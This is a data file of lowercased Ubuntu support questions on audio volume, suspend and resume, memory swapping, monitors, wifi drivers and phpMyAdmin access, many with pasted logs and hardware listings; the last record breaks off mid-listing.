482532	ubuntu has low volume after start-up	after booting my computer running ubuntu 13.10 , the volume always starts at around 30 % . this happens with the default volume program and pulse audio . how can i fix this ?
482533	toshiba resume automatically after suspending in ubuntu 14.04	i have a toshiba l845 and i when i suspend ubuntu it wake up 2 seconds later . here you are some info . cat /proc/cmdline boot_image=/boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=80498f02-8962-4085-81f7-7e01fbc494fc ro quiet splash intel_pstate=enable vt.handoff=7 lspci -k | grep -ia2 vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] subsystem : toshiba america info systems radeon hd 7670m kernel driver in use : fglrx_pci cat /var/log/syslog | grep pm : jun 12 18:38:58 amrras-pc kernel : [ 8765.969162 ] pm : syncing filesystems ... done . jun 12 18:38:58 amrras-pc kernel : [ 8766.110230 ] pm : preparing system for mem sleep jun 12 18:38:58 amrras-pc kernel : [ 8766.113428 ] pm : entering mem sleep jun 12 18:38:58 amrras-pc kernel : [ 8768.119383 ] pm : suspend of devices complete after 2009.020 msecs jun 12 18:38:58 amrras-pc kernel : [ 8768.119501 ] pm : late suspend of devices complete after 0.117 msecs jun 12 18:38:58 amrras-pc kernel : [ 8768.197198 ] pm : noirq suspend of devices complete after 77.819 msecs jun 12 18:38:58 amrras-pc kernel : [ 8768.197824 ] pm : saving platform nvs memory jun 12 18:38:58 amrras-pc kernel : [ 8768.823061 ] pm : restoring platform nvs memory jun 12 18:38:58 amrras-pc kernel : [ 8769.069601 ] pm : noirq resume of devices complete after 125.436 msecs jun 12 18:38:58 amrras-pc kernel : [ 8769.069725 ] pm : early resume of devices complete after 0.099 msecs jun 12 18:38:58 amrras-pc kernel : [ 8771.333504 ] pm : resume of devices complete after 2267.391 msecs jun 12 18:38:58 amrras-pc kernel : [ 8771.333680 ] pm : finishing wakeup . jun 12 18:40:15 amrras-pc kernel : [ 8839.193188 ] pm : syncing filesystems ... done . jun 12 18:40:15 amrras-pc kernel : [ 8839.378479 ] pm : preparing system for mem sleep jun 12 18:40:15 amrras-pc kernel : [ 8839.381667 ] pm : entering mem sleep jun 12 18:40:15 amrras-pc kernel : [ 8841.444678 ] pm : suspend of devices complete after 2064.091 msecs jun 12 18:40:15 amrras-pc kernel : [ 8841.444833 ] pm : late suspend of devices complete after 0.152 msecs jun 12 18:40:15 amrras-pc kernel : [ 8841.524584 ] pm : noirq suspend of devices complete after 79.797 msecs jun 12 18:40:15 amrras-pc kernel : [ 8841.525148 ] pm : saving platform nvs memory jun 12 18:40:15 amrras-pc kernel : [ 8842.253549 ] pm : restoring platform nvs memory jun 12 18:40:15 amrras-pc kernel : [ 8842.501780 ] pm : noirq resume of devices complete after 127.505 msecs jun 12 18:40:15 amrras-pc kernel : [ 8842.501902 ] pm : early resume of devices complete after 0.097 msecs jun 12 18:40:15 amrras-pc kernel : [ 8844.770332 ] pm : resume of devices complete after 2269.779 msecs jun 12 18:40:15 amrras-pc kernel : [ 8844.770548 ] pm : finishing wakeup . jun 12 18:46:17 amrras-pc kernel : [ 9194.444252 ] pm : syncing filesystems ... done . jun 12 18:46:17 amrras-pc kernel : [ 9194.616654 ] pm : preparing system for mem sleep jun 12 18:46:17 amrras-pc kernel : [ 9194.619833 ] pm : entering mem sleep jun 12 18:46:17 amrras-pc kernel : [ 9196.628265 ] pm : suspend of devices complete after 2010.496 msecs jun 12 18:46:17 amrras-pc kernel : [ 9196.628390 ] pm : late suspend of devices complete after 0.123 msecs jun 12 18:46:17 amrras-pc kernel : [ 9196.706763 ] pm : noirq suspend of devices complete after 78.457 msecs jun 12 18:46:17 amrras-pc kernel : [ 9196.707303 ] pm : saving platform nvs memory jun 12 18:46:17 amrras-pc kernel : [ 9197.435387 ] pm : restoring platform nvs memory jun 12 18:46:17 amrras-pc kernel : [ 9197.683504 ] pm : noirq resume of devices complete after 127.185 msecs jun 12 18:46:17 amrras-pc kernel : [ 9197.683623 ] pm : early resume of devices complete after 0.096 msecs jun 12 18:46:17 amrras-pc kernel : [ 9199.950284 ] pm : resume of devices complete after 2269.140 msecs jun 12 18:46:17 amrras-pc kernel : [ 9199.950520 ] pm : finishing wakeup . and last : pastebinit /var/log/pm-suspend.log link i found this behavior too : in ac mode , if i disable bluetooth the system suspends ok ( i tried several times ) in battery mode , it works always ok . i really do not understand what is going on . pd : sorry for my english thanks update ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! well , it seems that everything is random . then another thing i did was : i realized that acpitool can change devices to not wake up from suspend ( according to what i read ) before device s-state status sysfs node -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 . p0p1 s4 *disabled 2 . glan s0 *disabled 3 . ehc1 s3 *enabled pci:0000:00:1d.0 4 . ehc2 s3 *enabled pci:0000:00:1a.0 5 . xhc s3 *enabled pci:0000:00:14.0 6 . hdef s0 *disabled pci:0000:00:1b.0 7 . rp01 s4 *disabled pci:0000:00:1c.0 8 . rp02 s4 *disabled 9 . pxsx s4 *disabled 10 . fres s0 *disabled 11 . rp03 s0 *disabled pci:0000:00:1c.2 12 . pxsx s4 *disabled pci:0000:08:00.0 13 . rp04 s4 *disabled pci:0000:00:1c.3 14 . pxsx s4 *enabled pci:0000:09:00.0 15 . athe s4 *disabled 16 . rp05 s4 *disabled 17 . pxsx s4 *disabled 18 . rp06 s4 *disabled 19 . pxsx s4 *disabled 20 . rp07 s4 *disabled 21 . pxsx s4 *disabled 22 . rp08 s4 *disabled 23 . pxsx s4 *disabled 24 . peg0 s4 *disabled pci:0000:00:01.0 25 . pegp s4 *disabled 26 . peg1 s4 *disabled 27 . peg2 s4 *disabled 28 . peg3 s4 *disabled 29 . lid s4 *enabled after this command : acpitool -w 5 using lspic i found that device 3,4,5 was : 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) device s-state status sysfs node -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 . p0p1 s4 *disabled 2 . glan s0 *disabled 3 . ehc1 s3 *disabled pci:0000:00:1d.0 4 . ehc2 s3 *disabled pci:0000:00:1a.0 5 . xhc s3 *disabled pci:0000:00:14.0 6 . hdef s0 *disabled pci:0000:00:1b.0 7 . rp01 s4 *disabled pci:0000:00:1c.0 8 . rp02 s4 *disabled 9 . pxsx s4 *disabled 10 . fres s0 *disabled 11 . rp03 s0 *disabled pci:0000:00:1c.2 12 . pxsx s4 *disabled pci:0000:08:00.0 13 . rp04 s4 *disabled pci:0000:00:1c.3 14 . pxsx s4 *enabled pci:0000:09:00.0 15 . athe s4 *disabled 16 . rp05 s4 *disabled 17 . pxsx s4 *disabled 18 . rp06 s4 *disabled 19 . pxsx s4 *disabled 20 . rp07 s4 *disabled 21 . pxsx s4 *disabled 22 . rp08 s4 *disabled 23 . pxsx s4 *disabled 24 . peg0 s4 *disabled pci:0000:00:01.0 25 . pegp s4 *disabled 26 . peg1 s4 *disabled 27 . peg2 s4 *disabled 28 . peg3 s4 *disabled 29 . lid s4 *enabled i do not like this solution but it is what i have for now . i do not know how make this setting permanent because i lost changes after reboot . any idea ? ? ? i 'm afraid to have any side effect thanks again martin
482534	how to block certain characters from a string in python	i am writing a program that takes the text written in a text document called datafile.txt , then prints what is in the file . the text that is in the file is is `` hello world '' , but the text that prints is `` [ 'hello world ' ] '' how do i make it so the characters [ , ] , and ' do not appear . file = open ( `` datafile.txt '' , `` r '' ) lines = file.readlines ( ) savedir = lines print savedir
482536	will downloading ubuntu remove my current os	i 'm going to download ubuntu onto this computer which runs windows xp . will installing ubuntu automatically replace and remove my current os , or will i have to do that manually ? another question i have : will i have to backup the files and programs on my computer in order to have them after i install ubuntu ?
482538	responsiveness drops drastically when ram get 's full after upgrading from 13.04	since i 've upgraded from ubuntu 13.04 to 14.04 ( and before 13.10 ) my system get 's to it 's knees when the memory get 's full and has to start swaping.. of course i know that a performance penalty should occur , but this is too much.. even the pointer stops working for a few seconds and one time i had to manualy reboot the notebook ( i was n't unable to switch to a console with alt+fx to kill some process ) . this usually happens with google chrome when i go to far opening tabs and i have a few other apps running , still i expect from linux to behave much better than this and i think this started happening since 13.10 an 14.04 . i 'm using `` system load indicator '' ( by hofmann ) and when the memory get 's full the cpu load get 's to 100 % and if i do n't start inmediately to close stuff , caos is inevitable . here is my notebook hardware specification : lenovou310 description : laptop product : ideapad u310 ( system skunumber ) vendor : lenovo version : lenovo u310 serial : qtf0e423807536 width : 64 bits capabilities : smbios-2.7 dmi-2.7 vsyscall32 configuration : administrator_password=unknown boot=normal chassis=laptop family=ideapad u310 frontpanel_password=unknown keyboard_password=unknown power-on_password=unknown sku=system skunumber uuid=0062e5dd-80c0-047a-bbc8-089e0131c789 *-core description : motherboard product : lenovo vendor : lenovo physical id : 0 version : lenovo u310 serial : qb06137476 slot : part component *-firmware description : bios vendor : lenovo physical id : 5 version : 65cn15ww date : 06/05/2012 size : 128kib capacity : 6592kib capabilities : pci upgrade shadowing cdboot bootselect edd int5printscreen int9keyboard int14serial int17printer int10video pc98 acpi usb biosbootspecification netboot uefi *-cpu description : cpu product : intel ( r ) core ( tm ) i5-3317u cpu @ 1.70ghz vendor : intel corp. physical id : 0 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i5-3317u cpu @ 1.70ghz serial : to be filled by o.e.m . slot : cpu socket - u3e1 size : 782mhz capacity : 782mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms cpufreq configuration : cores=2 enabledcores=2 threads=4 *-cache:0 description : l1 cache physical id : 2 slot : l1-cache size : 32kib capacity : 32kib capabilities : internal write-through instruction *-cache:1 description : l2 cache physical id : 3 slot : l2-cache size : 256kib capacity : 256kib capabilities : internal write-through unified *-cache:2 description : l3 cache physical id : 4 slot : l3-cache size : 3mib capacity : 3mib capabilities : internal write-back unified *-cache description : l1 cache physical id : 1 slot : l1-cache size : 32kib capacity : 32kib capabilities : internal write-through data *-memory description : system memory physical id : 36 slot : system board or motherboard size : 4gib *-bank:0 description : sodimm ddr3 synchronous 1600 mhz ( 0,6 ns ) product : sharetronic vendor : 0000 physical id : 0 serial : edd60803 slot : channela-dimm0 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:1 description : dimm [ empty ] physical id : 1 slot : channelb-dimm0 *-pci description : host bridge product : 3rd gen core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : f0000000-f03fffff memory : e0000000-efffffff ioport:3000 ( size=64 ) *-usb:0 description : usb controller product : 7 series/c210 series chipset family usb xhci host controller vendor : intel corporation physical id : 14 bus info : pci @ 0000:00:14.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:40 memory : f0600000-f060ffff *-communication description : communication controller product : 7 series/c210 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei_me latency=0 resources : irq:43 memory : f0615000-f061500f *-usb:1 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : f0619000-f06193ff *-multimedia description : audio device product : 7 series/c210 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:46 memory : f0610000-f0613fff *-pci:0 description : pci bridge product : 7 series/c210 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 *-pci:1 description : pci bridge product : 7 series/c210 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 ioport:2000 ( size=4096 ) ioport : f0400000 ( size=1048576 ) *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 05 serial : 08:9e:01:31 : c7:89 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff *-pci:2 description : pci bridge product : 7 series/c210 series chipset family pci express root port 3 vendor : intel corporation physical id : 1c.2 bus info : pci @ 0000:00:1c.2 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:18 memory : f0500000-f05fffff *-network description : wireless interface product : centrino wireless-n 2200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : c4 serial : 9c:4e:36:74 : fc:9c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-29-generic firmware=18.168.6.1 ip=192.168.1.126 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:44 memory : f0500000-f0501fff *-usb:2 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f0618000-f06183ff *-isa description : isa bridge product : hm77 express chipset lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-storage description : sata controller product : 7 series chipset family 6-port sata controller [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:42 ioport:3088 ( size=8 ) ioport:3094 ( size=4 ) ioport:3080 ( size=8 ) ioport:3090 ( size=4 ) ioport:3060 ( size=32 ) memory : f0617000-f06177ff *-serial unclaimed description : smbus product : 7 series/c210 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f0614000-f06140ff ioport : efa0 ( size=32 ) *-scsi:0 physical id : 2 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : sandisk ssd u100 physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 10.5 serial : 123703305383 size : 22gib ( 24gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=a157f07e *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 1d689f36-584e-43fa-9913-9fba14388fe6 size : 18gib capacity : 18gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2013-10-15 21:14:43 filesystem=ext4 lastmountpoint=/ modified=2014-06-11 19:46:24 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2014-06-11 19:46:24 state=mounted *-volume:1 description : linux swap volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 1 serial : 08b19113-2637-4773-bd5a-f29e84f437d9 size : 3924mib capacity : 3924mib capabilities : primary nofs swap initialized configuration : filesystem=swap pagesize=4096 *-scsi:1 physical id : 3 logical name : scsi1 capabilities : emulated *-disk description : ata disk product : st500lt012-9ws14 vendor : seagate physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/sdb version : 0001 serial : w0v201ja size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=4096 signature=a157f067 *-volume description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 1:0.0.0,1 logical name : /dev/sdb1 logical name : /media/hdd2 version : 1.0 serial : 277ade7b-18eb-4b1c-9bc5-53c523e71eb1 size : 465gib capacity : 465gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2013-10-15 21:14:47 filesystem=ext4 lastmountpoint=/media/hdd2 modified=2014-06-11 19:46:26 mount.fstype=ext4 mount.options=rw , relatime , data=ordered mounted=2014-06-11 19:46:26 state=mounted *-battery product : smart battery vendor : intel corp. physical id : 1 version : 2008 serial : 1.0 slot : rear *-power unclaimed description : tbd by odm product : tbd by odm vendor : tbd by odm physical id : 2 version : 1.0 serial : tbd by odm capacity : 32768mwh any directions how to diagnose or solve this issue ? thanx ! -- -- - edit1 -- -- -- ok , i will expand according to request , i set up a simple batch file to log system usage every 2 secs : # ! /bin/bash stamp= $ ( date + '' % h_ % m_ % s '' ) echo -e `` ** memory usage **\n '' > > $ stamp free -mh > > $ stamp echo -e `` \n** top 20 process by memory usage **\n '' > > $ stamp ps aux -- sort -rss | cut -c-120 | head -n 20 > > $ stamp echo -e `` \n** top 10 process by cpu usage **\n '' > > $ stamp ps aux -- sort -c | cut -c-110 | head -n 10 > > $ stamp echo $ stamp then i 've run it with watch every 2 secs and started toying around.. this is a snapshot of my system at moment zero , i have a bunch of apps open but everything is smooth : ** memory usage ** total used free shared buffers cached mem : 3,7g 3,5g 221m 458m 49m 914m -/+ buffers/cache : 2,6g 1,2g swap : 3,8g 321m 3,5g ** top 20 process by memory usage ** user pid % cpu % mem vsz rss tty stat start time command pablo 6649 0.0 7.7 885004 303968 ? sl jun12 0:29 zeus command : server pablo 12849 0.4 5.6 1143948 221364 ? sl jun12 3:23 /usr/lib/thunderbird/thunderbird pablo 6219 0.4 5.0 1320524 196468 ? sl jun12 7:33 /opt/google/chrome/chrome -- type=gpu-process -- channel= pablo 6606 0.0 4.2 448240 166980 pts/24 sl+ jun12 0:00 zeus slave : test_helper pablo 6578 0.0 4.0 430084 159872 pts/24 sl+ jun12 0:02 zeus slave : test_environment pablo 6581 0.0 3.8 478248 149860 pts/24 sl+ jun12 0:02 zeus slave : development_environment pablo 6599 0.0 3.8 479336 148716 pts/24 sl+ jun12 0:00 zeus slave : prerake pablo 6646 0.0 3.7 478248 148372 ? ssl jun12 0:03 zeus runner : server pablo 6183 0.7 3.7 1110824 148172 ? sll jun12 12:44 /opt/google/chrome/chrome pablo 2467 1.3 3.1 1747564 122460 ? sl jun11 25:31 compiz pablo 6573 0.0 3.0 361908 119024 pts/24 sl+ jun12 0:01 zeus slave : default_bundle pablo 6497 0.0 2.7 341316 106412 pts/24 sl+ jun12 0:00 zeus slave : boot pablo 21267 0.5 2.3 1065768 89972 ? sl 02:34 0:06 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21500 1.5 2.1 1057900 82376 ? sl 02:46 0:06 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21337 0.4 1.9 1053920 77052 ? sl 02:38 0:04 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21620 1.9 1.9 1049320 76592 ? sl 02:50 0:03 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21404 0.6 1.9 1051528 74452 ? sl 02:41 0:04 /opt/google/chrome/chrome -- type=renderer -- lang=en-us root 1330 0.8 1.8 441088 72656 tty7 ssl+ jun11 16:03 /usr/bin/x -core :0 -seat seat0 -auth /var/run/lightdm/ pablo 19127 0.0 1.7 1036788 70244 ? sl jun12 0:07 /opt/google/chrome/chrome -- type=renderer -- lang=en-us ** top 10 process by cpu usage ** user pid % cpu % mem vsz rss tty stat start time command pablo 21620 1.9 1.9 1049320 76592 ? sl 02:50 0:03 /opt/google/chrome/chrome -- type=renderer -- l pablo 21500 1.5 2.1 1057900 82376 ? sl 02:46 0:06 /opt/google/chrome/chrome -- type=renderer -- l pablo 2467 1.3 3.1 1747564 122460 ? sl jun11 25:31 compiz pablo 21211 1.1 1.5 1022532 59316 ? sl 02:30 0:15 /opt/google/chrome/chrome -- type=renderer -- l pablo 21379 1.0 0.6 802196 26116 ? ssl 02:40 0:08 gvim snapshot pablo 21285 0.9 0.6 969072 24564 ? sl 02:34 0:10 /opt/google/chrome/chrome -- type=ppapi -- chan pablo 21482 0.9 1.7 1039728 68976 ? sl 02:45 0:04 /opt/google/chrome/chrome -- type=renderer -- l root 1330 0.8 1.8 441088 72656 tty7 ssl+ jun11 16:03 /usr/bin/x -core :0 -seat seat0 -auth /var/ru pablo 6183 0.7 3.7 1110824 148172 ? sll jun12 12:44 /opt/google/chrome/chrome this is a snapshot of my system under heavy load , actually opening multiple chrome tabs , almost without response : ** memory usage ** total used free shared buffers cached mem : 3,7g 3,6g 155m 455m 17m 693m -/+ buffers/cache : 2,9g 866m swap : 3,8g 347m 3,5g ** top 20 process by memory usage ** user pid % cpu % mem vsz rss tty stat start time command pablo 6649 0.0 7.6 885004 299060 ? sl jun12 0:29 zeus command : server pablo 21816 49.3 7.3 1215860 285332 ? sl 02:53 0:13 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 6219 0.4 5.8 1336344 229096 ? rl jun12 7:37 /opt/google/chrome/chrome -- type=gpu-process -- channel= pablo 12849 0.4 5.6 1143948 221360 ? sl jun12 3:23 /usr/lib/thunderbird/thunderbird pablo 6606 0.0 4.2 448240 166936 pts/24 sl+ jun12 0:00 zeus slave : test_helper pablo 6578 0.0 4.0 430084 159872 pts/24 sl+ jun12 0:02 zeus slave : test_environment pablo 6581 0.0 3.8 478248 149860 pts/24 sl+ jun12 0:02 zeus slave : development_environment pablo 6183 0.8 3.8 1244608 148912 ? sll jun12 12:54 /opt/google/chrome/chrome pablo 6599 0.0 3.8 479336 148716 pts/24 sl+ jun12 0:00 zeus slave : prerake pablo 6646 0.0 3.7 478248 148372 ? ssl jun12 0:03 zeus runner : server pablo 2467 1.3 3.0 1747256 119924 ? sl jun11 25:34 compiz pablo 6573 0.0 3.0 361908 119024 pts/24 sl+ jun12 0:01 zeus slave : default_bundle pablo 6497 0.0 2.7 341316 106412 pts/24 sl+ jun12 0:00 zeus slave : boot pablo 21267 0.5 2.3 1065768 89972 ? sl 02:34 0:06 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21958 44.0 2.1 1051856 83236 ? sl 02:53 0:02 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21500 1.4 2.1 1057900 82364 ? sl 02:46 0:06 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21620 1.6 1.9 1049320 76504 ? sl 02:50 0:03 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21337 0.4 1.9 1049824 75236 ? sl 02:38 0:04 /opt/google/chrome/chrome -- type=renderer -- lang=en-us pablo 21404 0.6 1.9 1051528 74320 ? sl 02:41 0:04 /opt/google/chrome/chrome -- type=renderer -- lang=en-us ** top 10 process by cpu usage ** user pid % cpu % mem vsz rss tty stat start time command pablo 21816 49.3 7.3 1215860 285332 ? sl 02:53 0:13 /opt/google/chrome/chrome -- type=renderer -- l pablo 21958 44.0 2.1 1051860 83236 ? sl 02:53 0:02 /opt/google/chrome/chrome -- type=renderer -- l pablo 22012 25.0 1.0 988364 42900 ? sl 02:53 0:00 /opt/google/chrome/chrome -- type=renderer -- l pablo 21620 1.6 1.9 1049320 76504 ? sl 02:50 0:03 /opt/google/chrome/chrome -- type=renderer -- l pablo 21500 1.4 2.1 1057900 82364 ? sl 02:46 0:06 /opt/google/chrome/chrome -- type=renderer -- l pablo 2467 1.3 3.0 1747256 119924 ? sl jun11 25:34 compiz pablo 21211 1.0 1.5 1022532 59316 ? sl 02:30 0:15 /opt/google/chrome/chrome -- type=renderer -- l pablo 21379 1.0 0.6 802196 26116 ? ssl 02:40 0:08 gvim snapshot pablo 21285 0.9 0.7 979840 30956 ? sl 02:34 0:11 /opt/google/chrome/chrome -- type=ppapi -- chan why is chrome using all that cpu when the memory starts to get full ? even if chrome is the `` culprit '' , is n't the os responsability to stay operable under heavy load ?
482539	wifi and touch pad inactive inspiron 5537	i have the 12.04 lts in my inspiron and suddenly wifi and touch pad became inactive . any ideas to resolve it ? ? ?
482549	gnome-screenshot gui : which command launches that ?	i 'm interested in setting up a keyboard shortcut that will launch the graphical user interface for gnome screenshot . i am however unable to find the command that launches the gui . executing gnome-screenshot simply takes a screenshot , which is not what i am interested in .
482553	ubuntu 14.04 - windows 7 install - 2nd drive	currently my laptop has two internal 500gb drives . they are both configured seperatly with ubuntu installed on one of them . what i 'd like to do , is see if there is a way to re partition the 2nd drive to install windows 7 on it and 'dual-boot ' if possible . thanks..
482556	second monitor does n't work properly ( ubuntu 14.04 , dell xps13 dev . edition ( intel hd4000 ) )	i fail at configuring a second monitor using mini-display-port > hdmi cable > asus mx279 on ubuntu 14.04 , dell xps 13 dev . edition ( latest intel hd4000 drivers installed ) . out of the box it worked first , then signal disappeared . i rebooted , signal disappeared again and did not reappear . ( also connection to monitor is no longer established ) . then i followed these instructions : can i force vga signal output even when xrandr shows 'disconnected ' ? it did not work ( can not configure crc1 ) . i changed hdmi cable to pricier one , no success . i searched 3 hours for solutions and did not find a particular one to be used for a newbie like me ... any ideas ?
482557	wifi problems with compaq cq60-419wm running athelos ar5009	i 've tried almost everything i can find including full re-install of kubuntu , and standard ubuntu . a lot of people say its the drivers which are ath5k driver which i have tried to run a new install of the driver , tried to run ndiswrapper ( which removed my wireless completely ) tried the madbull drivers , and tried a backporting the driver . none have worked . i added the computer type and wifi card type in the title just in case its one of those doing it instead . this is a log of all of the wireless status . http : //paste.ubuntu.com/7642556/
482558	how to enable access to websites	how to block a website from ubuntu , that the user can never access to that web site , please ? for example , if i want to block www.google.com , how do i to enable the access to it please ? thanks in advance !
482561	404 when accessing phpmysql	i need some hand holding . i have a website on aws . it was setup by someone else , so was not involved with the setup process . i have access to the site via winscp . i know that it is ubuntu but not much more . i need to access my database , so i assumed that i would use my browser and enter http : //www.mywebsite.com/phpmyadmin , but when i do i get a not found 404 . i read that if i use winscp terminal , i can insert the following ... sudo ln -s /etc/phpmyadmin/apache.conf /etc/apache2/conf.d/phpmyadmin.conf sudo /etc/init.d/apache2 restart ... . and that this may fix the problem , but i am scared that something terrible might happen . any help would be really appreciated . bob
482563	how to run a program from the command line and still be able to work on the command line while it runs ?	suppose that i want to run a java program so i would type java myprogram and then suppose that it prints some output to the screen but takes a few hours to finish running . if i want to keep working on the same terminal while it runs , what is the command that i should use ? i tried & at the end and it did not seem to work .
482564	realtek rtl8188ce desconects randomly and features slow connections	i am brand new to ubuntu and am having internet issues , as in it disconnects about 10 to 15 minutes in and is generally very slow . i realize this is a very common problem , but it seems like the solutions are dependent on the wireless card and router that you use . i ran the wireless_script and here is the result : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux sean-thinkpad-w530 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 00:19.0 ethernet controller [ 0200 ] : intel corporation 82579lm gigabit network connection [ 8086:1502 ] ( rev 04 ) subsystem : lenovo device [ 17aa:21f3 ] kernel driver in use : e1000e 03:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:8195 ] kernel driver in use : rtl8192ce # # # # # lsusb # # # # # bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 04f2 : b2ea chicony electronics co. , ltd integrated camera [ thinkpad ] bus 001 device 003 : id 147e:2020 upek touchchip fingerprint coprocessor ( wbf advanced mode ) bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 